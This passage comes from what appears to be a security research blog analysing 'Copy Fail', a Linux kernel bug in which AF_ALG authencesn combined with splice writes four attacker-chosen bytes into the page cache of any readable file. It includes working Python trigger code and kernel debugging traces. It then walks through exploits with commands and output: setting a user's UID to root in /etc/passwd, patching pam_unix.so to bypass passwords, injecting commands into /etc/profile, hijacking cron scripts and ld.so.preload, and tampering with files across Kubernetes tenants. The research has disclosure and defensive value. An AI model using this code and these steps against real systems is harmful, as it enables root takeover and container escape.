    """Write value (4 bytes) to page_cache[offset : offset+4] of the file represented by fd."""

    # Create an AF_ALG socket and bind authencesn(hmac(sha256),cbc(aes)).
    s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
    s.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    s.setsockopt(SOL_ALG, 1,  # ALG_SET_KEY = 1: all-zero key, content does not affect the trigger
                 b'\x08\x00\x01\x00'    # rtattr header
                 b'\x00\x00\x00\x10'    # enckeylen=16 (AES-128)
                 + b'\x00' * 32)         # 16B authkey + 16B enckey
    s.setsockopt(SOL_ALG, 5, None, AUTHSIZE)  # ALG_SET_AEAD_AUTHSIZE = 5; tag length = 4

    op = s.accept()[0]

    # Build 8 bytes of AAD: first 4 bytes are zero padding, last 4 bytes are the value.
    # authencesn writes AAD[4:8] (= value) to dst[assoclen + cryptlen].
    aad = b'\x00' * 4 + value   # 8 bytes
    op.sendmsg([aad],
               [(SOL_ALG, 3, b'\x00' * 4),              # ALG_SET_OP = 3: ALG_OP_DECRYPT (0)
                (SOL_ALG, 2, b'\x10' + b'\x00' * 19),   # ALG_SET_IV = 2: ivlen = 16, IV = 16 zero bytes
                (SOL_ALG, 4, struct.pack('I', ASSOCLEN))], # ALG_SET_AEAD_ASSOCLEN = 4: assoclen = 8
               socket.MSG_MORE)

    # splice target file [0, offset+4) into the AF_ALG socket.
    # splice passes page-cache page references without copying.
    pr, pw = os.pipe()
    os.splice(fd, pw, offset + AUTHSIZE, offset_src=0)
    os.splice(pr, op.fileno(), offset + AUTHSIZE)

    try:
        op.recv(ASSOCLEN + offset)  # triggers _aead_recvmsg -> authencesn scratch write
    except OSError:
        pass  # HMAC failure returns EBADMSG, but the page-cache write has completed
    op.close(); s.close(); os.close(pr); os.close(pw)

4.3 QEMU and GDB Kernel-Level Validation

To validate the full trigger path at kernel level, I built a controlled debugging environment: Linux 6.12.8 with debug symbols running inside QEMU, with GDB connected remotely and breakpoints placed on key functions to capture the complete execution chain.

Experiment code

The scripts and configuration files for this section are in the QEMU debug environment package. The GDB breakpoint scripts are separate. URL links have been intentionally removed from this blog version.

4.3.1 Building the Debug Environment

The debug environment is built through Docker to avoid setting up a cross-compilation toolchain on macOS. It produces three files: a compressed kernel bzImage, a debug-symbol vmlinux, and an initramfs containing BusyBox and the PoC utility.

# Build kernel + BusyBox + PoC through Docker. This takes about ten minutes.
docker build -t copyfail-build -f Dockerfile .
docker run --rm -v $(pwd)/output:/output copyfail-build

# Outputs:
#   output/bzImage        - compressed kernel (4.8 MB)
#   output/vmlinux        - DWARF debug symbols (126 MB), used by GDB
#   output/rootfs.cpio.gz - initramfs, including BusyBox and poc_pagecache_write

Key kernel configuration options:

CONFIG_CRYPTO_USER_API_AEAD=y    # AF_ALG AEAD interface
CONFIG_CRYPTO_AUTHENC=y          # authenc module
CONFIG_CRYPTO_SEQIV=y            # sequence-number IV
CONFIG_DEBUG_INFO_DWARF5=y       # full debug symbols
CONFIG_GDB_SCRIPTS=y             # GDB helper scripts
CONFIG_KALLSYMS_ALL=y            # expose all kernel symbols
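
Before booting, it can be worth confirming that the generated .config really enables these options. A small sketch, assuming the standard NAME=value format of kernel config files; missing_options is a hypothetical helper and treats only =y (built-in) as enabled, since that is what the list above uses.

```python
REQUIRED = [
    "CONFIG_CRYPTO_USER_API_AEAD",
    "CONFIG_CRYPTO_AUTHENC",
    "CONFIG_CRYPTO_SEQIV",
    "CONFIG_DEBUG_INFO_DWARF5",
    "CONFIG_GDB_SCRIPTS",
    "CONFIG_KALLSYMS_ALL",
]


def missing_options(config_text, required=REQUIRED):
    """Return the required options that are not set to 'y' in config_text."""
    enabled = set()
    for line in config_text.splitlines():
        line = line.strip()
        if line.startswith("#") or "=" not in line:
            continue                       # skip comments and "is not set" lines
        name, value = line.split("=", 1)
        if value.split("#")[0].strip() == "y":
            enabled.add(name.strip())
    return [opt for opt in required if opt not in enabled]


sample = """CONFIG_CRYPTO_USER_API_AEAD=y
# CONFIG_CRYPTO_AUTHENC is not set
CONFIG_CRYPTO_SEQIV=y
"""
missing = missing_options(sample)
```

In practice the function would be fed the contents of the build directory's .config file.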

Start the QEMU VM:

# Normal mode: boot directly into a shell.
./run_qemu.sh

# Debug mode: QEMU pauses and waits for GDB on :1234.
./run_qemu.sh debug

Connect from another terminal:

gdb ./vmlinux -ex 'target remote :1234' -ex 'continue'

4.3.2 Experiment 1: Verifying Page-Cache Writes

Inside the QEMU VM shell, run the automated experiment:

# === inside the VM ===

# 1. Create a test file.
echo "AABBCCDD EEFFGGHH IIJJKKLL MMNNOOPP" > /tmp/target.txt
hexdump -C /tmp/target.txt
# 00000000  41 41 42 42 43 43 44 44  20 45 45 46 46 47 47 48  |AABBCCDD EEFFGGH|
# 00000010  48 20 49 49 4a 4a 4b 4b  4c 4c 20 4d 4d 4e 4e 4f  |H IIJJKKLL MMNNO|
# 00000020  4f 50 50 0a                                        |OPP.|

# 2. First write: offset 0, value 0xDEADBEEF.
poc_pagecache_write /tmp/target.txt 0 0xDEADBEEF
# [*] Target: /tmp/target.txt
# [*] Offset: 0 (0x0)
# [*] Value:  0xdeadbeef
# [*] Writing 4 bytes to page cache...
# [+] Done. Page cache of /tmp/target.txt at offset 0 should now contain 0xdeadbeef

# 3. Verify the result.
hexdump -C /tmp/target.txt | head -2
# 00000000  ef be ad de 43 43 44 44  20 45 45 46 46 47 47 48  |....CCDD EEFFGGH|
#           ^^^^^^^^^^^
#           0xDEADBEEF (little-endian)

# 4. Second write: offset 8, value 0xCAFEBABE.
poc_pagecache_write /tmp/target.txt 8 0xCAFEBABE

# 5. Verify that the two writes do not interfere with each other.
hexdump -C /tmp/target.txt | head -2
# 00000000  ef be ad de 43 43 44 44  be ba fe ca 46 47 47 48  |....CCDD....FGGH|
#                                    ^^^^^^^^^^^
#                                    0xCAFEBABE (little-endian)

# 6. Verify drop_caches behavior. Files on tmpfs do not revert.
echo 3 > /proc/sys/vm/drop_caches
hexdump -C /tmp/target.txt | head -2
# 00000000  ef be ad de 43 43 44 44  be ba fe ca 46 47 47 48  |....CCDD....FGGH|
# On tmpfs: the page cache is the only copy of the data, so drop_caches cannot evict it.
# On disk filesystems such as ext4: the modified page is not marked dirty, so drop_caches
# evicts it and the next read reloads the original data from disk.

Conclusion: the four-byte page-cache write primitive works. The offset is precise, and repeated writes do not interfere with each other.
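
The byte order in the hexdump output follows from packing each 32-bit value as little-endian. The sketch below replays both writes on a copy of the test file content and reproduces the first hexdump line; it works on an in-memory buffer only.

```python
import struct

content = bytearray(b"AABBCCDD EEFFGGHH IIJJKKLL MMNNOOPP\n")

# Same offsets and values as the two poc_pagecache_write invocations above.
for offset, value in ((0, 0xDEADBEEF), (8, 0xCAFEBABE)):
    content[offset:offset + 4] = struct.pack("<I", value)   # little-endian u32

first_line = content[:16].hex(" ")
```

The resulting first_line matches the sixteen bytes shown by hexdump after step 5.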

4.3.3 Experiment 2: GDB Evidence Chain, SGL Layout, and Scratch Write

This is the most important validation step. GDB observes req->src == req->dst at the entry of crypto_authenc_esn_decrypt, proving that the vulnerable in-place path is active, and then traces the write operation in scatterwalk_map_and_copy until it lands on a page-cache page.

# === terminal 1: start QEMU in debug mode ===
./run_qemu.sh debug
# === Debug mode: QEMU paused, waiting for GDB on localhost:1234 ===

# === terminal 2: connect GDB and load the Python breakpoint script ===
gdb ./vmlinux -x exp3_2_gdb.py
# [GDB Script] Setting up breakpoints for Experiment 3.2+3.3...
# Breakpoint 1 at 0xffffffff812984f8: file crypto/authencesn.c, line 263.
# [GDB] BP1: crypto_authenc_esn_decrypt (entry)
# Breakpoint 2 at 0xffffffff8128f93e: file crypto/scatterwalk.c, line 57.
# [GDB] BP2: scatterwalk_map_and_copy (writes only)

(gdb) target remote :1234
(gdb) continue

After running poc_pagecache_write /tmp/target.txt 0 0xDEADBEEF inside the VM, GDB captures the following output:

============================================================
=== crypto_authenc_esn_decrypt ENTRY ===
  req       = 0xffff888002d96a90
  req->src  = 0xffff888002d96820
  req->dst  = 0xffff888002d96820
  src == dst: YES (IN-PLACE!)          <- root cause confirmed
  assoclen  = 8
  cryptlen  = 4 (before -= authsize)
============================================================
  --- dst SGL entries ---
  SGL[0]: page_link=0xffffea000006f440 offset=1760 length=8
  SGL[1]: page_link=0xffff8880027cbda1 offset=0 length=0 [CHAIN]
  SGL[2]: page_link=0xffffea000006f8c2 offset=0 length=4 [LAST]

=== [HIT 1] scatterwalk_map_and_copy WRITE ===
  buf=0xffffc90000113d20 sg=0xffff888002d96820 start=4 nbytes=4
  writing value: 0x41414141
  backtrace:
    #0 scatterwalk_map_and_copy
    #1 crypto_authenc_esn_decrypt      <- tmp[0] (AAD[0:4]) written to dst[4..7]
    #2 _aead_recvmsg
    #3 aead_recvmsg
    #4 sock_recvmsg_nosec
    #5 sock_recvmsg

=== [HIT 2] scatterwalk_map_and_copy WRITE ===
  buf=0xffffc90000113d24 sg=0xffff888002d96820 start=8 nbytes=4
  writing value: 0xdeadbeef            <- scratch write hits page cache
  backtrace:
    #0 scatterwalk_map_and_copy
    #1 crypto_authenc_esn_decrypt      <- dst[assoclen+cryptlen] = dst[8+0] = page cache
    #2 _aead_recvmsg
    ...

=== [HIT 3] scatterwalk_map_and_copy WRITE ===
  buf=0xffffc90000113cc8 sg=0xffff888002d96820 start=0 nbytes=8
  writing value: 0x41414141
  backtrace:
    #0 scatterwalk_map_and_copy
    #1 crypto_authenc_esn_decrypt_tail <- ESN header restore after HMAC cleanup
    ...

Key interpretation:

| Field | Meaning |
|---|---|
| src == dst: YES | Confirms in-place mode introduced by 72548b093ee3. |
| SGL[1]: [CHAIN] | sg_chain() linked tag pages to the RX SGL. |
| SGL[2]: offset=0 length=4 [LAST] | The tag page is the file's page-cache page at offset 0. |
| HIT 2: value=0xdeadbeef start=8 | The scratch write targets dst[8], exactly the start of the chained tag page. |

The SGL layout and call chain are fully captured: recv() -> _aead_recvmsg -> crypto_authenc_esn_decrypt -> scatterwalk_map_and_copy(WRITE) -> page cache.
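
The offset arithmetic behind HIT 1 and HIT 2 can be checked with a small model. This is an illustrative Python sketch, not kernel code: it treats the dst SGL as a list of data-carrying entries taken from the GDB output above and resolves a logical offset to the entry it falls in. The names SGL and resolve are hypothetical.

```python
# Data-carrying entries of the dst SGL, taken from the GDB output above.
# The [CHAIN] entry has length 0 and only links the two lists, so it is omitted.
SGL = [
    (8, "RX buffer"),             # SGL[0]: length=8
    (4, "page-cache tag page"),   # SGL[2]: length=4 [LAST]
]

def resolve(sgl, start):
    """Map a logical byte offset to (entry label, offset inside that entry)."""
    for length, label in sgl:
        if start < length:
            return label, start
        start -= length
    raise ValueError("offset beyond end of scatterlist")

assoclen, cryptlen, authsize = 8, 4, 4
cryptlen -= authsize                       # the decrypt path subtracts the tag size

print(resolve(SGL, 4))                     # HIT 1: start=4
print(resolve(SGL, assoclen + cryptlen))   # HIT 2: start=8
```

Under this model, start=4 stays inside the RX buffer, while start=8 is the first byte past it and therefore byte 0 of the chained page-cache page.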

4.3.4 Experiment 3: Comparing with the Patched Kernel

Under the same environment, boot a 6.12.85 kernel containing patch a664bf3d603d and repeat the experiment:

# Start with the patched kernel.
BZIMAGE=bzImage.patched VMLINUX=vmlinux.patched ./run_qemu.sh debug

GDB output after the fix:

============================================================
=== crypto_authenc_esn_decrypt ENTRY ===
  req       = 0xffff888002dcea90
  req->src  = 0xffff888002e6d880
  req->dst  = 0xffff888002dce820
  src == dst: NO                       <- fixed: out-of-place mode
  assoclen  = 8
  cryptlen  = 4 (before -= authsize)
============================================================
  --- dst SGL entries ---
  SGL[0]: page_link=0xffffea000006f582 offset=1760 length=8 [LAST]
                                                              ^^^^
  Only one entry: no CHAIN and no page-cache page.

=== [HIT 1] scatterwalk_map_and_copy WRITE ===
  writing value: 0x41414141
  sg->page_link = 0xffffea000006f582   <- RX buffer, safe

=== [HIT 2] scatterwalk_map_and_copy WRITE ===
  writing value: 0xdeadbeef
  sg->page_link = 0xffffea000006f582   <- RX buffer again, harmless

| Item | Vulnerable kernel (6.12.8) | Patched kernel (6.12.85) |
|---|---|---|
| src == dst | Yes, in-place | No, out-of-place |
| dst SGL entries | 3 entries, including CHAIN and a page-cache page | 1 entry, RX buffer only |
| scratch-write target | page-cache page | RX buffer |
| page cache after execution | modified | unchanged |

5. A Recurring Vulnerability Pattern: Page-Cache Overwrite

Dirty Pipe in 2022, Copy Fail in 2026, and the later Dirty Frag bugs share a clear pattern: splice() zero-copy injects file page-cache page references into a kernel subsystem, and a code path in that subsystem writes to those references. The concrete writes differ: pipe merge, crypto scratch write, and in-place decrypt. The result is the same: file page cache is modified without going through the VFS write path.

| Vulnerability | Year | Mechanism | Deterministic write | Page-cache only |
|---|---|---|---|---|
| Dirty Pipe (CVE-2022-0847) | 2022 | pipe flag initialization bug plus splice | Yes | Yes |
| Copy Fail (CVE-2026-31431) | 2026 | AF_ALG in-place optimization plus splice | Yes | Yes |
| Dirty Frag (CVE-2026-43284/43500) | 2026 | xfrm-ESP / RxRPC in-place decryption plus splice | Yes | Yes |

Their trigger paths differ, but the core result is shared: a kernel path bypasses VFS write-permission checks and directly modifies file page-cache content through page references injected by splice. Because the modification does not pass through the VFS write path, the page is not marked dirty. The original file on disk is unaffected. The tampering exists only in memory and disappears after reboot or drop_caches.
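
Because the cached copy and the on-disk copy diverge, one way to look for this class of tampering is to compare a buffered read with a direct-I/O read of the same file. The following is a minimal sketch under stated assumptions, not a production detector: it assumes the filesystem supports O_DIRECT (tmpfs and some others may not), and the helper names diff_windows, read_buffered, read_direct, and check are hypothetical.

```python
import mmap
import os

def diff_windows(cached: bytes, on_disk: bytes, window: int = 4):
    """Return start offsets of aligned windows whose bytes differ."""
    size = min(len(cached), len(on_disk))
    return [off for off in range(0, size, window)
            if cached[off:off + window] != on_disk[off:off + window]]

def read_buffered(path: str, size: int) -> bytes:
    """Normal read: served from the page cache when the page is resident."""
    with open(path, "rb") as f:
        return f.read(size)

def read_direct(path: str, size: int, block: int = 4096) -> bytes:
    """O_DIRECT read: asks the kernel to fetch from storage instead of cached pages.
    Assumption: the underlying filesystem implements direct I/O."""
    aligned = -(-size // block) * block      # round up to a block multiple
    buf = mmap.mmap(-1, aligned)             # anonymous mmap is page-aligned
    fd = os.open(path, os.O_RDONLY | os.O_DIRECT)
    try:
        got = os.preadv(fd, [buf], 0)
        return bytes(buf[:min(got, size)])
    finally:
        os.close(fd)
        buf.close()

def check(path: str, size: int = 4096):
    """Offsets where the cached view and the on-disk view disagree."""
    return diff_windows(read_buffered(path, size), read_direct(path, size))
```

A non-empty result from check() on a file that nobody has legitimately written to would be a signal worth investigating. An empty result only covers the bytes that were compared.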

[Figure: Page cache overwrite vulnerability family]

The older Dirty COW vulnerability achieved a similar unauthorized file-data modification through a different mechanism: an mmap copy-on-write race plus GUP. Dirty COW does not involve splice or in-place operation. After the race succeeds, the modified page is marked dirty and written back to disk. It is a different class of bug.

Once the primitive is equivalent, the exploitation surface is also similar. The following sections use Copy Fail as the example primitive: a four-byte controlled write to the page cache of any readable file. All paths below were experimentally confirmed on CentOS Stream 8 with an unpatched 4.18.0-553 kernel, and the conclusions apply to page-cache overwrite bugs of the same class.

Experiment code

The PoC scripts for host attacks are part of the page-cache guard experiment set. URL links have been removed from this blog version.

5.1 /etc/passwd UID Tampering

/etc/passwd is world-readable (mode 0644) on virtually every Linux distribution, making it a natural target.

The idea is to change the UID field of a target user from 1000 to 0000. Only one ASCII digit actually changes, so a single four-byte write covers the whole field. The resulting 0000 parses as UID 0, which Linux treats as root.

# Before: testuser123:x:1000:1000::/home/testuser123:/bin/bash
python3 exp_passwd_uid.py testuser123
# [+] SUCCESS: UID changed to 0000 in page cache

id testuser123
# uid=0(root) gid=0(root) groups=0(root)

su - testuser123
# whoami -> root
# /etc/shadow is readable

# Restore.
echo 3 > /proc/sys/vm/drop_caches

A single four-byte write is enough for privilege escalation. No shellcode or ELF knowledge is needed, and the path is distribution-independent. Since PG_dirty is not set, drop_caches restores the original content.
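
Locating the write offset is a matter of parsing the passwd format. The sketch below works on an in-memory copy and performs no kernel interaction. The function name find_uid_field is hypothetical, and the root line in the sample is an assumed typical entry.

```python
def find_uid_field(passwd: bytes, user: str):
    """Return (file offset, length) of the UID field for `user`, or None."""
    offset = 0
    for line in passwd.splitlines(keepends=True):
        fields = line.rstrip(b"\n").split(b":")
        if len(fields) >= 4 and fields[0] == user.encode():
            # name ':' password ':' UID -> skip two fields and their colons
            uid_off = offset + len(fields[0]) + 1 + len(fields[1]) + 1
            return uid_off, len(fields[2])
        offset += len(line)
    return None

sample = (b"root:x:0:0:root:/root:/bin/bash\n"
          b"testuser123:x:1000:1000::/home/testuser123:/bin/bash\n")

off, length = find_uid_field(sample, "testuser123")
# Model the effect of one four-byte write on a copy of the file content.
patched = sample[:off] + b"0000" + sample[off + 4:]
print(off, length)
print(patched.decode())
```

The single-write shortcut only applies when the UID field is exactly four characters wide. A shorter or longer field would need a different window or more than one write.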

5.2 PAM Authentication Bypass

pam_unix.so is the standard Linux password-authentication module and is usually 0644.

The idea is to modify the password-check path in pam_sm_authenticate: replace mov %eax,%ebp (89 c5), which saves the real return value, with xor %ebp,%ebp (31 ed), forcing the function to return PAM_SUCCESS (0):

; after password verification, save the return value
0x3d5e:  89 c5           mov  %eax, %ebp    ; original: save real verification result
; patched to:
0x3d5e:  31 ed           xor  %ebp, %ebp    ; tampered: clear to zero = PAM_SUCCESS

python3 exp_pam_bypass.py
# [*] Auto-detected patch offset: 0x3d5e
# [*] Patching to: 31ede95e (xor %ebp,%ebp)
# [+] SUCCESS: pam_unix.so patched in page cache

su root
# Password: any input
# whoami -> root
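
The primitive always writes four bytes, but the instruction being replaced is only two bytes long, so the write value has to carry the two following original bytes unchanged. A minimal sketch of that step follows. The name build_patch is hypothetical, and the trailing bytes e9 5e are inferred from the "Patching to" line above rather than read from the binary.

```python
def build_patch(blob: bytes, offset: int, new_prefix: bytes, width: int = 4) -> bytes:
    """Return the `width`-byte value to write at `offset`: the replacement
    instruction bytes followed by the original bytes that must be preserved."""
    if len(new_prefix) > width:
        raise ValueError("replacement longer than one write window")
    window = blob[offset:offset + width]
    if len(window) < width:
        raise ValueError("write window runs past end of data")
    return new_prefix + window[len(new_prefix):]

# Assumed bytes at the patch site: mov %eax,%ebp (89 c5) followed by e9 5e.
site = bytes.fromhex("89c5e95e")
patch = build_patch(site, 0, bytes.fromhex("31ed"))   # xor %ebp,%ebp
print(patch.hex())
```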

Persistence detail. Processes such as sshd, login, and sd-pam load pam_unix.so through mmap(MAP_PRIVATE). These mappings keep references to the modified page, preventing drop_caches from evicting it. During invalidate_inode_page(), the kernel sees page_mapped() and skips eviction. The modification persists until all mapping processes exit or the file's inode is replaced, for example through yum reinstall pam.

5.3 Live-Patching Shared Libraries

Linux loads .so shared libraries through mmap(MAP_PRIVATE). Processes using the same library share the same physical page-cache pages. Modifying the page cache of a .so file is equivalent to modifying the code or data section seen by all running processes that have mapped that library. x86 cache coherence makes the write immediately visible to instruction and data fetches on all cores.

The experiment uses libnss_files.so, the system NSS name-resolution library, which is 0644, and a long-running monitor process:

# Step 1: start a monitor process that keeps reading a string from its mmap mapping.
gcc -o monitor exp_shared_lib_monitor.c -ldl
./monitor &
# [monitor] PID=161045
# [monitor] initial: "/etc/hosts"
# [monitor] tick 1: no change
# [monitor] tick 2: no change

# Step 2: tamper with the .so page cache from another terminal.
python3 exp_shared_lib.py
# [+] SUCCESS: '/etc/hosts' -> '/etc/h0sts' in page cache

# Step 3: the monitor sees the change without restart.
# [monitor] tick 3: *** STRING CHANGED ***
# [monitor] now: "/etc/h0sts"
# [monitor] *** LIVE-PATCH CONFIRMED (no restart) ***

The key evidence is that monitor process PID 161045 never restarts. It reads the original value during ticks 1 and 2, then immediately sees the modified string at tick 3 after the PoC runs.

On CentOS 8, more than twenty system daemons, including sshd, crond, dockerd, and dbus-daemon, hold mmap references to libnss_files.so. drop_caches cannot evict the modified page. The modification remains semi-persistent while the system is running, and recovery requires replacing the file, for example by reinstalling the package that owns it (glibc on CentOS 8) with yum reinstall glibc.
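
To see which processes keep such a page pinned, one can scan /proc/<pid>/maps for the library path. The sketch below is a hedged illustration: the helper names are hypothetical, and it needs root to read the maps of other users' processes.

```python
import os

def maps_references(maps_text: str, needle: str) -> bool:
    """True if any mapping line in a /proc/<pid>/maps dump names `needle`."""
    for line in maps_text.splitlines():
        parts = line.split(None, 5)           # the pathname is the 6th column
        if len(parts) == 6 and needle in parts[5]:
            return True
    return False

def pids_mapping(needle: str, proc: str = "/proc"):
    """PIDs whose address space maps a file whose path contains `needle`.
    Unreadable processes are skipped, so run as root for full coverage."""
    found = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc, entry, "maps")) as f:
                if maps_references(f.read(), needle):
                    found.append(int(entry))
        except OSError:
            continue                           # process exited or access denied
    return sorted(found)

# Hypothetical maps excerpt, used only to exercise the parser.
sample_maps = (
    "7f1c2a400000-7f1c2a40b000 r-xp 00000000 fd:00 1234 /usr/lib64/libnss_files-2.28.so\n"
    "7ffd10000000-7ffd10021000 rw-p 00000000 00:00 0\n"
)
print(maps_references(sample_maps, "libnss_files"))
```

As long as pids_mapping("libnss_files") returns any PID, the tampered page stays mapped and drop_caches is expected to leave it in place.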

Risk note

Modifying the code section of core system libraries such as libc.so can theoretically lead to arbitrary code execution in root daemons that call the modified function, but it carries a high risk of crashing the system. The experiment above only modified a string in the .rodata section as a safer validation.

5.4 /etc/profile Command Injection

/etc/profile is 0644 on Linux distributions and is automatically sourced by every login shell, including SSH login, su -, and console login.

The idea is to use an existing comment line as cover. The injected command overwrites part of the comment, and the remaining original text is commented out by #, leaving the rest of the file functional:

# Original: # It's NOT a good idea to change this file unless you know what you
# Injected: id>>/tmp/CF-PWNED  #ea to change this file unless you know what you
#           command part       '#' comments out the remaining text

python3 exp_profile_inject.py "id>>/tmp/CF-PWNED  #"
# [*] Payload: 20 bytes, 5 writes
# [+] SUCCESS: command injected into /etc/profile

# Trigger: root starts a login shell.
su - root -c "echo triggered"

cat /tmp/CF-PWNED
# uid=0(root) gid=0(root) groups=0(root)

Only five writes, twenty bytes total, are needed. This path is highly portable because every distribution has /etc/profile, and it usually contains comment lines. A real attack could inject a reverse shell or a backdoor-user creation command, for example useradd -o -u0 backdoor #.
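
The write count follows directly from the payload length. The sketch below splits the payload into four-byte chunks and applies them to an in-memory copy of the comment line, which models the effect without touching any file. The name split_payload is hypothetical, and base=0 stands in for the real offset of the comment line inside /etc/profile.

```python
def split_payload(payload: bytes, base: int, width: int = 4):
    """Split `payload` into (offset, chunk) pairs, one per four-byte write."""
    if len(payload) % width:
        raise ValueError("pad the payload to a multiple of the write width")
    return [(base + i, payload[i:i + width])
            for i in range(0, len(payload), width)]

original = b"# It's NOT a good idea to change this file unless you know what you"
payload = b"id>>/tmp/CF-PWNED  #"

line = bytearray(original)
writes = split_payload(payload, base=0)
for off, chunk in writes:
    line[off:off + len(chunk)] = chunk     # model one primitive write

print(len(payload), len(writes))
print(line.decode())
```

The two spaces before '#' pad the command to twenty bytes, a multiple of the four-byte write width.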

5.5 Tampering Scheduled-Task Scripts

Cron jobs and systemd services often reference scripts or binaries that are world-readable. They are passive targets: after tampering, the attacker only waits for the daemon's next scheduled execution.

# Setup: a cron job runs /tmp/copyfail-lab/cron_target.sh every minute.
# Script content: echo "ORIGINAL $(date +%s)" >> cron.log

# Tamper with the script page cache.
python3 exp_cron_script.py /tmp/copyfail-lab/cron_target.sh
# [+] SUCCESS: script tampered in page cache ("ORIGINAL" -> "HIJACKED")

# Next cron trigger, within one minute:
tail /tmp/copyfail-lab/cron.log
# HIJACKED 1778309461   <- crond executed the tampered script

Each time the job fires, crond launches the script and the interpreter reads the file through the page cache, so it naturally consumes the tampered data. The same applies to service scripts referenced by systemd.

Configuration files versus script files

Directly modifying cron configuration files in /etc/cron.d/ or systemd unit files in page cache is technically possible, but it is not practical in real attacks. cronie uses inotify to detect configuration changes, and page-cache modification does not trigger inotify. crond must restart to read the change. Systemd unit-file changes also require systemctl daemon-reload or a service restart. A low-privilege attacker cannot normally force these daemon operations. Practical attack paths are limited to scripts or binaries already referenced by existing jobs.

5.6 /etc/ld.so.preload Path Hijack

Shared libraries listed in /etc/ld.so.preload are loaded by the dynamic linker before normal libraries for every newly started program. Modifying a listed path gives global code injection.

# Precondition: /etc/ld.so.preload already exists, for example for performance monitoring.
cat /etc/ld.so.preload
# /tmp/copyfail-lab/libmarker.so

python3 exp_preload_hijack.py
# [+] SUCCESS: preload path hijacked
# /tmp/copyfail-lab/libmarker.so -> /tmp/copyfail-lab/libevil00.so

ls /dev/null
# [preload] EVIL LIBRARY LOADED!   <- malicious library loaded by every new process
# /dev/null

Precondition: /etc/ld.so.preload must already exist. Copy Fail cannot create new files; it can only modify the page cache of existing files. The file is absent by default, but it commonly appears in environments using jemalloc preloading, LD_PRELOAD security agents, or performance-monitoring tools.


6. Deep Dive into Container Scenarios

The previous section covered several host-side privilege-escalation paths. In containerized infrastructure, the threat goes further: Page Cache is global shared state that crosses container isolation boundaries. After disclosure, multiple security teams quickly examined container and Kubernetes environments. The results showed that PSS Restricted and RuntimeDefault do not block AF_ALG, production EKS clusters can reproduce the issue end to end, and a privileged DaemonSet that shares an image layer can be abused for Pod-to-Node escape. This section independently validates and extends those findings, focusing on practical exploitability boundaries.

All conclusions below were experimentally verified on a real Kubernetes cluster: k3s v1.32 with containerd v2.0.5, running CentOS Stream 8 with an unpatched 4.18.0-553 kernel.

Container experiment code

The Pod YAML files, PoC scripts, and validation tools are in the container experiment package. URL links have been removed from this blog version.

6.1 Image-Layer Sharing: Cross-Container Page-Cache Propagation

Container runtimes such as containerd and Docker use overlayfs to manage container filesystems. For the same base image, such as python:3.11-slim, the image layers are stored once on the host. All containers using that image have lower layers pointing to the same set of inodes.

This means that when container A reads /usr/bin/python3, the kernel creates a page-cache entry for that inode. When container B later reads the same file, it hits the exact same page-cache page.

One important boundary must be emphasized: Page Cache is global at kernel level, but its scope is one machine. Only containers on the same node can share overlayfs layers that point to the same inodes and therefore share page-cache pages. Containers on different nodes have independent page caches, even if they use the same image. This same-node condition is the fundamental prerequisite for all cross-container attack scenarios below.

[Figure: Overlayfs layer sharing mechanism]

Experiment: Cross-Container Page-Cache Sharing

Deploy the experiment and verify inode sharing:

# Deploy two Pods using the same base image.
kubectl create ns copyfail-lab
kubectl apply -f pod-cross-tenant.yaml

# Verify that both Pods share the same /etc/os-release inode.
kubectl exec -n copyfail-lab pod-attacker -- stat -c '%i' /etc/os-release
# 208483846
kubectl exec -n copyfail-lab pod-victim-same -- stat -c '%i' /etc/os-release
# 208483846    <- same inode = shared page cache
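
The same check can be scripted on the host against two snapshot paths on the backing filesystem. This is a minimal sketch: shares_inode is a hypothetical helper, and the demo uses a hard link in a temporary directory as a stand-in for two paths that resolve to one inode.

```python
import os
import shutil
import tempfile

def shares_inode(path_a: str, path_b: str) -> bool:
    """True if both paths resolve to the same inode on the same device."""
    a, b = os.stat(path_a), os.stat(path_b)
    return (a.st_dev, a.st_ino) == (b.st_dev, b.st_ino)

# Demo: a hard link shares the inode, a copy does not.
with tempfile.TemporaryDirectory() as d:
    base = os.path.join(d, "layer_file")
    with open(base, "w") as f:
        f.write("x")
    link = os.path.join(d, "hardlink")
    os.link(base, link)
    copy = os.path.join(d, "copy")
    shutil.copy(base, copy)
    linked = shares_inode(base, link)
    copied = shares_inode(base, copy)

print(linked, copied)
```

Two paths that share an inode also share page-cache pages, which is the property the cross-container experiment relies on.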

Run the page-cache write inside the attacker Pod:

# Run the PoC in the attacker Pod.
kubectl exec -n copyfail-lab pod-attacker -- python3 /poc_marker.py /etc/os-release
# [*] Target: /etc/os-release
# [*] Before: 50524554
# [*] After:  deadbeef
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef

# Victim Pod using the same base image immediately sees the tampered bytes.
kubectl exec -n copyfail-lab pod-victim-same -- \
  python3 -c "import os; print(os.pread(os.open('/etc/os-release',0),16,0).hex())"
# deadbeef54595f4e414d453d22446562
# [+] MARKER FOUND: page cache is SHARED with attacker pod!

# Control group using a different base image is unaffected.
kubectl exec -n copyfail-lab pod-victim-alpine -- head -c 16 /etc/os-release | xxd
# 00000000: 4e41 4d45 3d22 416c 7069 6e65  NAME="Alpine

Reading the corresponding file directly from the containerd snapshot directory on the host shows the same tampered data:

# Host reads the snapshot-layer file.
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb

# drop_caches restores it.
echo 3 > /proc/sys/vm/drop_caches
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562  PRETTY_NAME="Deb

6.2 Zero-Privilege Cross-Tenant Attack

[Figure: Zero-privilege cross-tenant attack]

Based on the sharing mechanism above, we can validate a zero-privilege cross-tenant attack where attacker and victim run in completely separate namespaces:

# Create two isolated namespaces.
kubectl create ns copyfail-lab      # attacker
kubectl create ns tenant-victim     # victim

# Deploy the Pods. See pod-cross-tenant.yaml in the experiment package.
kubectl apply -f pod-cross-tenant.yaml

Prerequisite validation: confirm inode sharing

# Two Pods in different namespaces, same base image -> same inode.
kubectl exec -n copyfail-lab pod-attacker -- stat -c '%i' /bin/cat
# 1420102
kubectl exec -n tenant-victim victim-app -- stat -c '%i' /bin/cat
# 1420102    <- same inode, even across namespaces

Attack execution

# Step 1: verify that the victim's /bin/cat is normal.
kubectl exec -n tenant-victim victim-app -- \
  python3 -c "import os; print(os.pread(os.open('/bin/cat',0),16,0).hex())"
